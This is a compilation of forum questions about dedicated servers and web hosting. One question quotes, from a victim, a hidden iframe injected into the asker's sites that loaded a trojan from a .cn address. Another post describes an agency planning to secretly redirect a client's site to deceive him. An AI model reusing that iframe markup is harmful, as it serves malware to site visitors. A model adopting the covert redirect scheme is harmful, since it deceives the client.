What are some reliable yet inexpensive hosting solutions for dedicated servers? I have developed a java based web application using struts, tomcat, mysql etc. I want to host all of these on a server (OS platform should not matter since it is all Java and mysql) that runs in some reliable data center. I want to get the benefit of all the managed services (they take backups etc right) but have my own server for dealing with the user-load and also that the Java apps dont run nicely on shared hosted systems (and they will not have all the tools and libraries we use). I am looking to see if there is any data center in India as well that has proven connectivity. Whatsoever information on this topic is much appreciated.
Is a dedicated server the right solution for my small company? Currently we are utilizing a shared server with Lunarpages but our website and our email seems to have an outage every month. This was also the case with our previous host. My boss is getting very annoyed and so I'm looking for solutions. Going from $50/year to $150/month for a small website with little traffic and no e-commerce seems a bit extreme. Can anyone make any recommendations? Do you know if I can use a dedicated server as an off site backup for the data on our office server (that might justify the cost)?
Is having one's own server more reliable and viable than renting one (ie dedicated server)? I am at present renting a server (called dedicated server) through a third party to run my website and a database. I am not sure whether having a dedicated server is a long term solution for my websites because everything depends on the third party. I want to instal my own server but I am worried about the complexities and the cost of maintaining in terms of security. Please advise me which is the best route.
multiple domain one dedicated server? I am trying to build my dedicated server which will host about 10 domains. I have tried isapirewriter and IIRF for this structure. structure: domain1.com->virtual directory1 domain2.com->virtual directory2 and so on you got the idea. is there a tutorial or doc todo this. I have been looking everywhere and its really hard to build up an IIS6 in this situation I miss apache. btw I made some imrovements for www.biraa.com but it lost its css and image paths. I am trying to build this kinda solution because I like to automate this process. pls dont suggest right click on "default web site" and "new web site" solution because it will not be automated in the future. thanks in advance
Dedicate halo ce server!!? Hi, well i was planning to host a dedicate server for halo ce. It showed that my server is running but when i looked up in internet lobby, i didn't find my server. any possible solution and ideas plsss.. thanx in advance
Whose fault is it, me or the client when doing web site? Last month my company started work on this person's website which sells awards and trophies. We made a deal with him. It was a $6200 sale for me. On the contract, he didnt want web hosting with us. Let me back up, he wanted to turn his normal website into a e-Commerce website which requires a dedicated server. We run other client's sites on dedicated servers. He refused saying he has sites all on network solutions website and he doesnt want to change hosts. We asked him various times if he is running windows 2003 and dedicated server. Network solutions we later found out doesnt run either. So about a month, we were working on his site which is bs because he didnt So back and forth we were also trying to figure out his name server because he bought his name server overseas which is stupid. Now I had to keep explaining to him why we cant work on his site because he has to have his name server pointing to us and we need his ftp login information so we can upload files to his site. He is so ignorant of all this. Today I called him saying we need to move his site over to our server because network solution doesnt allow us to install sitegalaxy onto network solution. Then he got upset and said " just give us all the images your company has done for us", " we are done working with you , it seems that you guys are not capable of doing the work we asked "...etc I said I will contact him later today. First off, we did finish his site . We gave him access to his own administrative control panel so he can upload the images and files himself. What we are trying to do is turn his site online by replacing it with a site he has now. What we are going to do is trick him by having a redirect routing pointing to our server when he assumes that hes actually going to his server. So whose fault is this? What have we done wrong? I keep telling him that Im just the messenger for my boss and dont blame me because I dont want this to be added to my resume when i find another job in the future. Btw, is market manager worth mentioning in my resume when it has no experience with networking? 1. He did mention he did not want our hosting. We told him that he needs to get dedicated server. He says why not use our network solution hosting we have? We told him its not dedicated because e-Commerce sites need larger space but he kept ignoring and said just use ours. So we just continued work. 2. He didnt pay all. He said once his site is online then he will pay the remaining cost which is $800. Right now, we are trying to figure out how to get his site up and running using network solution's web host which is 100 gigs. We redirect just to get his site up and running and move on. Its giving everyone on our company headaches. Helpful person , let me explain some things to you . First, go back to college and learn to read. We did check network solutions. They dont offer dedicated servers. Period. We told the client numerous times, he still did not understand. We offered him to let us host it since we use dedicated servers, no budge. No, we want to host the site because we do 24/7 backup, free debugging, free antivirus, if anything happens to the site, we can fix it right away. Thats also our maintence combination. Plus, if he has any graphics that needs changing like vacation notice, we can change it for free, no charge. We did find out what operation system they use. Its linux and windows. I told him that he needs to use windows, he says " we'll i'll buy you a windows pro package"..which doesnt help , its not dedicated. His name server is at oznic which is switzerland. We gotten no response from them about this issue as of yet. We are professional. We have over 60+ clients from americasmart.com
Server characteristics for online shop? Hello everybody, If you know, could you tell me which are the most suitable characteristics, when buying windows hosting, for a bookstore shop (selling books, cds, dvds, games, etc), that will use ASP and MS SQL? I'm wondering about disk space, bandwidth, shared hosting, VPS, dedicated server, etc, among other things. I've seen many solutions but would not wish to follow one which is too expensive for the shop needs. The shop will do its business in a country of no more that 15 million people by a rather small company. Thanks in advance.
How to get a fast website? Getting feedback that our website is slow in some countries - customers reporting that our webpages take a long time to appear. What can we do? Our site is on a dedicated server, looking for a quick and easy solution.
Network of Dedicated Servers? I am looking for a number of servers (say 40 dedicated machines) each with their own IP, not in the same IP address range, spread around the world. It can be Linux of windows PCs. Does anyone know of a good solution or service for this? I have looked into EC2 from Amazon but they do not have the support I need. Ideas? Note: I am not looking for caching services or exclusively web hosting. The machines should have different external IPs, possibly different locations and also be able to run desktop windows applications. The servers will be working independently. They will also be running a .NET desktop application and another 3rd party windows application and need a connection to the internet. Linux or Mono wont work. Linux would work if the version support vmware.
What's the best server/host? Like godaddy or network solutions? I noticed a lot say unlimited everything but then they want you to buy the expensive dedicated server, what's the deal yo? A little more info: my site is a place you can come and chat, creating text files, user setup/account files, a bit of AJAX, backed by PHP, lots of dynamic movements and functions but that's all client-side so don't worry about that. I'm hoping it will have a few million uses in a year or two, but not right away.
How to structure file server to work with database? I need advise on makeing a good site structure. I have folders that contain unique images uploaded by users that are referenced to database entries. Was told this can cause the server to crash as the number of folders grows. Is there a better solution to this? (it's a windows 2003 server) and mysql server. I believe the DB server is separate from the one hosting the site. Not sure how youtube is structured but it's kinda similiar. there are say 1mln users and so there'd be 1 mln folders on the server each named with the unique user id (as referenced in the users table in DB) so for example tehre are entries Userid 1 2 3 ... And on the server tehre are folders 1 2 3 ... Each folder referencing to the user id. And contains files uploaded by that user. Anyway the questions is that i was told this can cause the server to crash as the number of folders increases. Something about permissions being reset for all the folders once a new one is added. Any opinions? is this a bad structure? how can it be improved? I go with what i can afford atm. So i might switch to a dedicated server but that stil would not solve the problem (if there's any with this) I currently ahve 4000 such folders. Each one has couple of folders inside it and the support staff from the Hosting company said this is causing problems. Please advise.
Server Port?????????????????/? so because port forwarding isnt an option for me (dont ask why) i was loking for a solution that would allow me to run my own server, but wen i ran the F.E.A.R. dedicated server, it was on port 27888, and people could actually join that game, this means that on my router, port 2788 is already open! so i was wondering if it was possible (on any http server) to change the port from 80 to 27888 ok thanks, but wouldnt it be possible to go to either dyndns.org or no-ip.org and instead of entering my ip, enter my ip with its port? that way u wont hav to enter the port number wen typing in my the dns that i make
Can't send email from my server to a Yahoo! mail account - and it will take a week to find out why? I have a dedicated server and need to send email to Yahoo! Mail users. I'm getting a "temporarily deferred due to user complaints" message though I have never gotten a spam report ever. I asked what I guess is Yahoo! Mail support (http://help.yahoo.com/l/us/yahoo/mail/postmaster/defer.html) and got a worthless response: "We have received your message but due to a temporary problem we wanted to let you know it could take up to a week until you receive a response.". A week!??!!?! Has anyone else run across this and has a solution? I'm using SPF but not DK. My IP is not listed on any RBL's that I can find. Any other ideas?
Hosting shopping cart software open source? I am looking for an open source Solution similar to Zen or oscommerce that will allow me to sell server space on my dedicated server. Integrating with plesk etc. Does anyone know of such a Solution?
I'm looking for a company that offers dedicated managed servers in the us, asia, and europe & can mirror them. Our company has a worldwide presence and we offer 26 different versions of our website all based from our single server in california. Our customers in Asia and Europe say our website is too slow for them. So we would like to find a way to set up our main server in the us, and then mirror it to asia and europe. Ideally we would like to find a managed hosting solution that can handle the coordination as well as server maintenance, so we can spend our efforts on the website itself. Alas, I can't find any hosting companies that seem to offer hosting in a variety of countries and we were hoping to avoid having to work with 3 seperate companies in different parts of the world due to the added risks.
Who Would Be A Reliable Dedicated Web Host For A Relatively Large MP3 Site? Hi there, I am searching for a reliable dedicated hosting company that will be able to meet the needs of my future music site. On my site, users will be able to upload/ download mp3's as well as upload photos. I am not entirely sure what I am going to need in terms of plans, or how many page views(est: >300,000)/ mp3 downloads I will be getting a month, but know that I want to be on the safe side, and insure that there will not be a server overload, allowing at least several hundred people to access the site at the same time, without it slowing down. Users will be able to preview music as well , and I want to make sure that this function works smoothly without having connection issues due to too much activity at any given time. I am not entirely sure how many users will be uploading music, however, I am estimating that I will have over 50 GB of music on the site. I need a cost-effective solution, but do not want to cut corners with a plan that cannot support the site. Thank you! Sorry for not mentioning--these mp3's will be copyrighted by the users who uploaded. There will be absolutely no piracy on the site. Also meant to add, I have no interest in using shared hosting--These shared hosting companies sometimes put thousands of sites on the same server, and cannot deliver on the amount of transfer/storage that they offer. The sites have a "fair use" clause, and will instantly shut one's site down, if it's clogging up the server. Just to clarify, I am NOT expecting at least 300,000 downloads a month, but 300,000 page views. This is a very rough estimate, but would be about 10,000 page views a day.
What type of hosting? I'm looking into launching my own digital product, and it will be in the form of 15 videos - these videos are between 15 MB and 50 MB each... I'm looking into getting shared hosting through HostGator but I'm not sure that will be sufficient. I know it largely depends on how many people are downloading at one time.....do you think I'll go over my CPU usage limit or Memory usage limit if say 10-20 are downloading these videos at a time? These will be in the form of ZIP files, so it won't be streaming or anything. To recap: 15 Videos. Each between 15 MB and 50 MB each. Should I go with shared hosting, VPS hosting, or get a dedicated server? Anyone know of any solutions for these files?
Live TV Online, How? We’re doing a website for a TV station, and they want to have a live TV broadcast, the signal from their side will be SDI, after research we’ve came to two options, which made things confusing: 1.Installing DVR on the station 2.Using a streaming server Now: 1.Which is the better solution, considering: a.We want the best quality video and audio b.We’re considering having two choices; WMP, Real, and both have low (about 56k) and high (about 300k) c.We use Pal system 25 FPS d.If DVR is the best, then what’s the best available e.If Streaming server is the best what’s the best available (how about Real http://www.realnetworks.com/products/rbn/index.html#rbn) f.The video should be inside a custom page we create g.We have our own dedicated server, should we move the whole website to the streaming server? h.We’re planning to have a mirror servers, incase one is down it would direct to the mirror 2.Why some video dimension are wider then others (both TV broadcast) should be about 320x240 – 352x212 3.And if any body have any experience or comments with links regarding that it would most appreciated
MYSQL security issue - need advice? I am on a godaddy server, shared, and they won't fix it, so I am asking someone hear for advice or a solution before getting my own dedicated server as a last resort. My sites were getting hacked about two months ago using an iframe code that went to a .cn site and apparently downloaded a trojan to the users machine. Well i cleaned up all my sites as it infected php, coldfusion, html files all the same with this little line of code on the end of each page. I changed all my passwords to ones using letters, numbers, symbols etc to avoid possible cracking. The code was and still is: < iframe src="http://liteautotop.cn/ts/in.cgi?mozila" width=1 height=1 style="visibility: hidden">< / iframe > (spaced out to avoid a problem here) Now two months later it's back, same issue, downloading a trojan to users machine. I am deleting the two sites that are having this issue at present only these two are, however I am tired of deleting and restoring databases every few months or more due to this obvious exploit. Need direction on what to do to secure the server from my end since it is on a shared server can I do anything without converting to a virtual or dedicated one? If you can lead me in the right direction of avoiding this type of attack yet again I would appreciate it. Only suggestion I gotten thus far is to 1- delete all website files like HTML, php and so forth (pdf, images, css files seem to be fine) and remove and reinstall databases. 2- get either a dedicated or virtual dedicated server so you can install a firewall on it to help protect it from such attacks. If by chance someone did download something onto their machine, your customers or visitors for example the best virus software I have found is Trend Micro. I had to do a clean install on my own system since it was quicker than fighting the trojan that was infecting my machine after visiting one of my sites. UPDATE I have since said screw godaddy for hosting and purchased a virtual dedicated server so I have more control over stuff such as this as well as installed software to block as much of this as possible. I purchased a nice package for $20 a month at infinitie.net, they have a special running on eBay, just search virtual server on ebay and their username was edealzdirect ... I am not promoting this seller, just a reference to it and what you can do besides waiting on godaddy to do nothing in the end.
help i have no idea wat this means some body explain in short text 10 points best answer in plain explantion? Overview Instant messaging (IM) and chat are technologies that facilitate near real-time text based communication between two or more participants over a network. It is important to understand that what separates chat and instant messaging from technologies such as e-mail is the perceived synchronicity of the communication by the user - Chat happens in real-time before your eyes. For this reason, some people consider communication via instant messaging to be less intrusive than communication via phone. However, some systems allow the sending of messages to people not currently logged on (offline messages), thus removing much of the difference between Instant Messaging and e-mail. Instant Messaging allows instantaneous communication between a number of parties simultaneously, by transmitting information quickly. Some IM systems allow users to use webcams and Microphone which made them more popular than others. Due to this feature users can have a real-time conversation. In addition IM has additional features such as: the immediate receipt of acknowledgment or reply, group chatting, conference services (including voice and video), conversation logging and file transfer. IM allows effective and efficient communication, featuring immediate receipt of acknowledgment or reply. In certain cases Instant Messaging involves additional features, which make it even more popular, i.e. to see the other party, e.g. by using web-cams, or to talk directly for free over the Internet. It is possible to save a conversation for later reference. Instant messages are typically logged in a local message history which closes the gap to the persistent nature of e-mails and facilitates quick exchange of information like URLs or document snippets (which can be unwieldy when communicated via telephone). [edit] History In early instant messaging programs each character appeared when it was typed. The UNIX "talk" command shown in these screenshots was popular in the 1980s and early 1990s.Instant messaging actually predates the Internet, first appearing on multi-user operating systems like CTSS and Multics[1] in the mid-1960s. Initially, many of these systems, such as CTSS'.SAVED, were used as notification systems for services like printing, but quickly were used to facilitate communication with other users logged in to the same machine. As networks developed, the protocols spread with the networks. Some of these used a peer-to-peer protocol (eg talk, ntalk and ytalk), while others required peers to connect to a server (see talker and IRC). During the Bulletin board system (BBS) phenomenon that peaked during the 1980s, some systems incorporated chat features which were similar to instant messaging; Freelancin'_Roundtable was one prime example. In the last half of the 1980s and into the early 1990s, the Quantum Link online service for Commodore 64 computers offered user-to-user messages between currently connected customers which they called "On-Line Messages" (or OLM for short). Quantum Link's better known later incarnation, America Online, offers a similar product under the name "AOL Instant Messages" (AIM). While the Quantum Link service ran on a Commodore 64, using only the Commodore's PETSCII text-graphics, the screen was visually divided up into sections and OLMs would appear as a yellow bar saying "Message From:" and the name of the sender along with the message across the top of whatever the user was already doing, and presented a list of options for responding.[2] As such, it could be considered a sort of GUI, albeit much more primitive than the later Unix, Windows and Macintosh based GUI IM programs. OLMs were what Q-Link called "Plus Services" meaning they charged an extra per-minute fee on top of the monthly Q-Link access costs. Modern, Internet-wide, GUI-based messaging clients, as they are known today, began to take off in the mid 1990s with ICQ (1996) being the first, followed by AOL Instant Messenger (AOL Instant Messenger, 1997). AOL later acquired Mirabilis, the creators of ICQ. A few years later ICQ (by now owned by AOL) was awarded two patents for instant messaging by the U.S. patent office. Meanwhile, other companies developed their own applications (Excite, MSN, Ubique, and Yahoo), each with its own proprietary protocol and client; users therefore had to run multiple client applications if they wished to use more than one of these networks. In 1998 IBM released IBM Lotus Sametime, a product based on technology acquired when IBM bought Haifa-based Ubique and Lexington-based Databeam. In 2000, an open source application and open standards-based protocol called Jabber was launched. Jabber servers could act as gateways to other IM protocols, reducing the need to run multiple clients. Multi-protocol clients such as Digsby,Pidgin, Trillian, Adium and Miranda can use any of the popular IM protocols by using additional local libraries for each protocol. IBM Lotus Sametime's November 2007 release added IBM Lotus Sametime Gateway support for XMPP. Recently, many instant messaging services have begun to offer video conferencing features, Voice Over IP (VoIP) and web conferencing services. Web conferencing services integrate both video conferencing and instant messaging capabilities. Some newer instant messaging companies are offering desktop sharing, IP radio, and IPTV to the voice and video features. The term "instant messenger" is a service mark of Time Warner[3] and may not be used in software not affiliated with AOL in the United States. For this reason, the instant messaging client formerly known as Gaim or gaim announced in April 2007 that they would be renamed "Pidgin"[4]. [edit] Cooperation Standard free instant messaging applications offer functions like file transfer, contact lists, the ability to have similtaneous converstations etc. These may be all the functions that a small business needs but larger organisations will require more sophisticated applications that can work together. The solution to finding applications capable of this is to use enterprise versions of instant messaging applications. These include titles like Jabber, Lotus Sametime, Microsoft Office Communicator, etc., which are often integrated with other enterprise applications such as workflow systems. These enterprise applications, or Enterprise Application Integration (EAI), are built to certain constraints, namely storing data in a common format. There have been several attempts to create a unified standard for instant messaging: IETF's SIP (Session Initiation Protocol) and SIMPLE (SIP for Instant Messaging and Presence Leveraging Extensions), APEX (Application Exchange), Prim (Presence and Instant Messaging Protocol), the open XML-based XMPP (Extensible Messaging and Presence Protocol), more commonly known as Jabber and OMA's (Open Mobile Alliance) IMPS (Instant Messaging and Presence Service) created specifically for mobile devices. Most attempts at creating a unified standard for the major IM providers (AOL, Yahoo! and Microsoft) have failed and each continues to use its own proprietary protocol. However, while discussions at IETF were stalled, Reuters head of collaboration services, David Gurle (the founder of Microsoft's Real Time Communication and Collaboration business), signed the first inter-service provider connectivity agreement on September 2003. This agreement enabled AIM, ICQ and MSN Messenger users to talk with Reuters Messaging counterparts and vice-versa against an access fee. Following this, Microsoft, Yahoo! and AOL came to a deal where Microsoft's Live Communication Server 2005 users would also have the possibility to talk to public instant messaging users. This deal established SIP/SIMPLE as a standard for protocol interoperability and established a connectivity fee for accessing public instant messaging clouds. Separately, on October 13, 2005 Microsoft and Yahoo! announced that by (the Northern Hemisphere) summer of 2006 they would interoperate using SIP/SIMPLE which is followed on December 2005 by the AOL and Google strategic partnership deal where Google Talk users would be able to talk with AIM and ICQ users provided they have an identity at AOL. There are two ways to combine the many disparate protocols: One way is to combine the many disparate protocols inside the IM client application. The other way is to combine the many disparate protocols inside the IM server application. This approach moves the task of communicating to the other services to the server. Clients need not know or care about other IM protocols. For example, LCS 2005 Public IM Connectivity. This approach is popular in Jabber/XMPP servers however the so-called transport projects suffer the same reverse engineering difficulties as any other project involved with closed protocols or formats. Some approaches, such as that adopted by the Sonork enterprise IM software or the Jabber/XMPP network or Winpopup LAN Messenger, allow organizations to create their own private instant messaging network by enabling them to limit access to the server (often with the IM network entirely behind their firewall) and administer user permissions. Other corporate messaging systems allow registered users to also connect from outside the corporation LAN, by using a secure firewall-friendly HTTPS based protocol. Typically, a dedicated corporate IM server has several advantages such as pre-populated contact lists, integrated authentication, and better security and privacy. Some networks have made changes to prevent them from being utilized by such multi-network IM clients. For example, Trillian had to release several revisions and patches to allow its users to access the MSN, AOL, and Yahoo! networks, after changes were made to these networks. The major IM providers typically cite the need for formal agreements as well as security concerns as reasons for making these changes. [edit] Mobile Instant Messaging Mobile Instant Messaging (MIM) is a presence enabled messaging service that aims to transpose the desktop messaging experience to the usage scenario of being on the move. While several of the core ideas of the desktop experience on one hand apply to a connected mobile device, others do not: Users usually only look at their phone's screen — presence status changes might occur under different circumstances as happens at the desktop, and several functional limits exist based on the fact that the vast majority of mobile communication devices are chosen by their users to fit into the palm of their hand. Some of the form factor and mobility related differences need to be taken into account in order to create a really adequate, powerful and yet convenient mobile experience: radio bandwidth, memory size, availability of media formats, keypad based input, screen output, CPU performance and battery power are core issues that desktop device users and even nomadic users with connected network. [edit] Friend-to-friend networks Instant Messaging may be done in a Friend-to-friend network, in which each node connects to the friends on the friendslist. This allows for communication with friends of friends and for the building of chatrooms for instant messages with all friends on that network. Emotions are often expressed in shorthand. For example; lol. But a movement is currently underway to be more accurate with the emotional expression. Real time reactions such as (chortle) (snort) (guffaw) or (eye-roll) are rapidly taking the place of acronyms.[citation needed] [edit] Business application Instant messaging has proven to be similar to personal computers, e-mail, and the WWW, in that its adoption for use as a business communications medium was driven primarily by individual employees using consumer software at work, rather than by formal mandate or provisioning by corporate information technology departments. Tens of millions of the consumer IM accounts in use are being used for business purposes by employees of companies and other organizations. In response to the demand for business-grade IM and the need to ensure security and legal compliance, a new type of instant messaging, called "Enterprise Instant Messaging" ("EIM") was created when Lotus Software launched IBM Lotus Sametime in 1998. Microsoft followed suit shortly thereafter with Microsoft Exchange Instant Messaging, later created a new platform called Microsoft Office Live Communications Server, and released Office Communications Server 2007 in October 2007. Both IBM Lotus and Microsoft have introduced federation between their EIM systems and some of the public IM networks so that employees may use a single interface to both their internal EIM system and their contacts on AOL, MSN, and Yahoo!. Current leading EIM platforms include IBM Lotus Sametime, Microsoft Office Communications Server, and Jabber XCP. In addition, industry-focused EIM platforms such as IMtrader from Pivot Incorporated, Reuters Messaging, and Bloomberg Messaging provide enhanced IM capabilities to financial services companies. The adoption of IM across corporate networks outside of the control of IT organizations creates risks and liabilities for companies who do not effectively manage and support IM use. Companies implement specialized IM archiving and security products and services like those from Secure Computing, Akonix, SurfControl, and ScanSafe to mitigate these risks and provide safe, secure, productive instant messaging capabilities to their employees. [edit] Practical Use in Enterprise The popular embrace of IM technology for sharing information has quickly led to organizations adopting IM solutions for the perceived advantages that can be brought by it. As organizations are becoming more information based (McNurlin & Sprague, 2006, p.499) the need for effective knowledge sharing, team working and collaborative environments amongst employees has become vital, especially within more geographically dispersed teams. Typically IM conversations tend to have a certain "character", they are often short and only cover one topic. Media-switching and multitasking are common throughout, however IM might also be used between established coworkers and friends for longer, more intermittent conversation. In their report of IM use at the workplace Nardi et al. (2000) identifies the four primary functions of IM which are often cited in other reports, These primary functions are: Quick Questions and Clarifications Coordinating and scheduling tasks Coordinating impromptu social meetings Keeping in touch with friends and family IM is perhaps best suited to "Quick Questions and Clarifications" as this is the most often mentioned attribute in other reports. A user can "respond rapidly without the overhead of telephone or FTF interaction. For example, IDC reports, "Users see IM as a medium for quick, semi-permanent ‘flashes’ that beg a near-immediate response" (Isaacs et al., 2002). Nardi's second and third observations are enabled in part due to the "Presence Awareness" feature of IM clients in which the user knows who is "available". This is the most relevant for colleagues who share the same physical space as each other and even paves the way for other mediums to take up the task of communication e.g. F2F or Phone. The implication is that viable communication of any sort can in someway be encouraged through IM's "Presence Awareness" feature. (Issacs et al, 2002) supports this view, "IM in business might not be the main tool for of communication, it could just be the meeting point for another type of media e.g. conference calls. Nardi's third and fourth observations focus on the social use of IM, which have also been widely publicized in other report. That IM is used for keeping in touch with friends and arranging social events has led some employers to believe that it is used primarily for this purpose. According to (Issacs et al, 2002) a market study found that "'Fear of losing employee productivity’ was the greatest concern of businesses in regards to instant messaging". The study by (Issacs et al, 2002) goes on to suggest this fear is unfounded as it was found that on average "only 13% of conversations contained personal topics", and "only 6.4% were exclusively personal". [edit] Review of Products "IM solutions can typically be catagorised into two types: Enterprise Instant Messaging (EIM) and Consumer Instant Mesaging (CIM). Enterprise solutions use an internal IM server, however this isn't always feasible, particularly for smaller businesses with limited budgets. The second option, using a (CIM) provides the advantage of being inexpensive to implement and has little need for investing in new hardware or server software. However, in recent years open source IM clients such as Jabber have emerged that provide free EIM grade solutions. (Wikipedia,. 2008) For corporate use encryption and conversation archiving are usually regarded as important features due to security concerns. Sometimes the use of different operating systems in organizations calls for the use of software that supports more than one platform. For example many software companies use Windows XP in administration departments but have software developers who use Linux. Most people have had experience of using online chat and messaging over the internet whether it is with Microsoft's Windows Live Messenger, Skype or e-mail. One form of chat and messaging currently popular is Bebo. It is a non-corporate form of messaging which allows its user to create and maintain a social network. Libraries use chat applications and Morris Messenger is an application commonly used by them. This is a power based instant messenger, which uses Perl, SQL, and small Java. It accepts input from both staff and regular customers and saves important information in an SQL database built for the system. [edit] Risks and liabilities Although instant messaging delivers many benefits, it also carries with it certain risks and liabilities, particularly when used in workplaces. Among these risks and liabilities are: Security risks (e.g. IM used to infect computers with spyware, viruses, trojans, worms) Compliance risks Inappropriate use Intellectual property leakage Crackers (malicious "hacker" or black hat hacker) have consistently used IM networks as vectors for delivering phishing attempts, "poison URL's", and virus-laden file attachments from 2004 to the present, with over 1100 discrete attacks listed by the IM Security Center[5] in 2004-2007. Hackers use two methods of delivering malicious code through IM: delivery of virus, trojan, or spyware within an infected file, and the use of "socially engineered" text with a web address that entices the recipient to click on a URL that connects him or her to a website that then downloads malicious code. Viruses, worms, and trojans typically propagate by sending themselves rapidly through the infected user's buddy list. An effective attack using a poison URL may reach tens of thousands of people in minutes when each person's buddy list receives messages appearing to be from a trusted friend. The recipients click on the web address, and the entire cycle starts again. Infections may range from nuisance to criminal, and are becoming more sophisticated each year. In addition to the malicious code threat, the use of instant messaging at work also creates a risk of non-compliance to laws and regulations governing the use of electronic communications in businesses. In the United States alone there are over 10,000 laws and regulations related to electronic messaging and records retention.[6] The more well-known of these include the Sarbanes-Oxley Act, HIPAA, and SEC 17a-3. Clarification from the Financial Industry Regulatory Authority ("FINRA") was issued to member firms in the financial services industry in December, 2007, noting that "electronic communications", "email", and "electronic correspondence" may be used interchangeably and can include such forms of electronic messaging as instant messaging and text messaging.[7] Changes to Federal Rules of Civil Procedure, effective December 1, 2006, created a new category for electronic records which may be requested during discovery (law) in legal proceedings. Most countries around the world also regulate the use of electronic messaging and electronic records retention in similar fashion to the United States. The most common regulations related to IM at work involve the need to produce archived business communications to satisfy government or judicial requests under law. Many instant messaging communications fall into the category of business communications that must be archived and retrievable. Organizations of all types must protect themselves from the liability of their employees' inappropriate use of IM. The informal, immediate, and ostensibly anonymous nature of instant messaging makes it a candidate for abuse in the workplace. The topic of inappropriate IM use became front page news in October 2006 when Congressman Mark Foley resigned his seat after admitting sending offensive instant messages of a sexual nature to underage former House pages from his Congressional office PC. The Mark Foley Scandal led to media coverage and mainstream newspaper articles warning of the risks of inappropriate IM use in workplaces. In most countries, corporations have a legal responsibility to ensure harassment-free work environment for employees. The use of corporate-owned computers, networks, and software to harass an individual or spread inappropriate jokes or language creates a liability for not only the offender but also the employer. A survey by IM archiving and security provider Akonix Systems, Inc. in March 2007 showed that 31% of respondents had been harassed over IM at work.[8] Companies now include instant messaging as an integral component of their policies on appropriate use of the World Wide Web, e-mail, and other corporate assets. Within the company there is also the risk of employees using instant messaging to release confidential information and project details to an outside source. This issue is best controlled by a combination of written policy and technology. An organization's policies on use of IM in the workplace should be an integral part of the overall computing and network use policies, and should be published and communicated at least annually. In addition to written policy, organizations should implement "gateways" or IM security products to monitor content of inbound and outbound messages. Products from IM security providers (See section on IM security) typically allow administrators to set alerts and enforce policy (i.e. allow or block messages) based on keywords and regular expressions within instant messages. Employees may also misuse IM to communicate on a personal level with friends and family. This is poor use of a business’s time and resources, as the employee’s effectiveness will most certainly decrease due to the added distractions. (Licari, J., May 2005). Businesses often use IM security products to monitor and archive IM conversations for the purpose of minimizing this type of productivity drain. [edit] Security and archiving In the early 2000s, a new class of IT security provider emerged to provide remedies for the risks and liabilities faced by corporations who chose to use IM for business communications. The IM security providers created new products to be installed in corporate networks for the purpose of archiving, content-scanning, and security-scanning IM traffic moving in and out of the corporation. Similar to the e-mail filtering vendors, the IM security providers focus on the risks and liabilities described above. With rapid adoption of IM in the workplace, demand for IM security products began to grow in the mid-2000s. By 2007, the preferred platform for the purchase of security software had become the "appliance", according to IDC, who estimate that by 2008, 80% of network security products will be delivered via an appliance.[9] [edit] User base Note that many of the numbers listed in this section are not directly comparable, and some are speculative. Some instant messaging systems are distributed among many different instances and thus difficult to measure in total (e.g. Jabber). While some numbers are given by the owners of a complete instant messaging system, others are provided by commercial vendors of a part of a distributed system. Some companies may be motivated to inflate their numbers in order to increase advertisement earnings or to attract partners, clients, or customers. Importantly, some numbers are reported as the number of "active" users (without a shared standard of that activity), others indicate total user accounts, while others indicate only the users logged in during an instance of peak usage. How to recover data from HD? One of the HD went bad (connected to SATA 3) and the RAID has been broken in the BIOS. This is what I was told from my dedicated server host, I do not have much experience with computers but I do have very important data. On request to recover the data I was told: The best solution is to reinstall on one new disk, then plug in your three good drives as additional drives, which will let you recover the data. I have agreed to this but now clueless as to what to do now to recover the files. I have tried opening the drives in My Computer but it says the disk is not formatted and if I format all data will be erased. I have also used a data recovery software but when I try to restore the files needed, they all fail to restore completely as half of the text in the .txt file is gone.
Looking for a web solution for weekly inventory, keeping track of weekly shipments and returns.? Preferably looking for a solution that can be accessed via a web browser, uses a php or similar front end, and a mysql backend. We have a separate dedicated web server we can use for this purpose. Would like to able to generate basic reports and shipping statements from a workstation browser. We ship a certain product every week to the same outlets. We have under 1000 outlets, and we usually ship the same quantities weekly. We then get the unsold product returned, as well as the cash for the sold products. We only sell 1 product at one price, but it has to be unique every week, as they are time sensitive. I've looked for some solutions, but they seem quite time consuming, as we have to constantly enter in the quantities individually for each outlet every week. We are currently using one big excel spreadsheet with outlet names and quantities, and performing a mail merge with a word document. Is there a nice all in one solution out there that would suit my needs?
Remote X server or VNC? Here's the story. I have two machines, one is an old 800mhz laptop with 128 mb of RAM, the other is a stationery, powerful AMD64 machine. I work at a web development studio and hence I need to use the full-quality AMD64 machine for development. However, I'm unable to do so because we have no room in the office to install a stationery desktop PC. The 800mhz laptop with 128mb of RAM obviously isn't sufficient, even with XFCE (takes 3 minutes to open firefox). Here is my solution: I will set up the desktop PC with KDE 4, throw in 2 LAN cards, and put it somewhere unseen. One of the LAN cards will be for a dedicated line, connected to my laptop (crossover or thru switch). The other LAN card will be used to allow the machine to access the office network/internet. Basically, I wanna use the laptop as a "thin client", with all the processing happening on the desktop machine, with the laptop only used for display and input. Since the remote desktop setup will be on a dedicated line, bandwidth is not an issue. Should I set it up to have the laptop open a Remote X connection, or act as a VNC client? Which will be faster and/or more responsive? I need as little mem/cpu load on the laptop as possible. Thanks in advance
How can Amazon Web Services best be used for hosting multiple websites? I work at a web agency and have several clients we would put on a single dedicated LAMP server environment that belongs to us. I'm thinking of moving over to Amazon Web Services and want to learn about the best setup for my client's needs. Should I be putting only one website on a virtual machine, or can I configure Apache to host several websites on one server? Note that these websites aren't high-traffic apps. Are there any third party solutions I should consider, like Virtualmin?
Windows Web Hosting Control Panel? I am looking for a reliable web hosing contropl panel for a Windows Server 2003 Enterprise edition dedicated. I would prefer to use apache, php and mysql as the hosting. (WAMP) and good free solutions? or, possibly low cost? any info would be greatly appreciated.
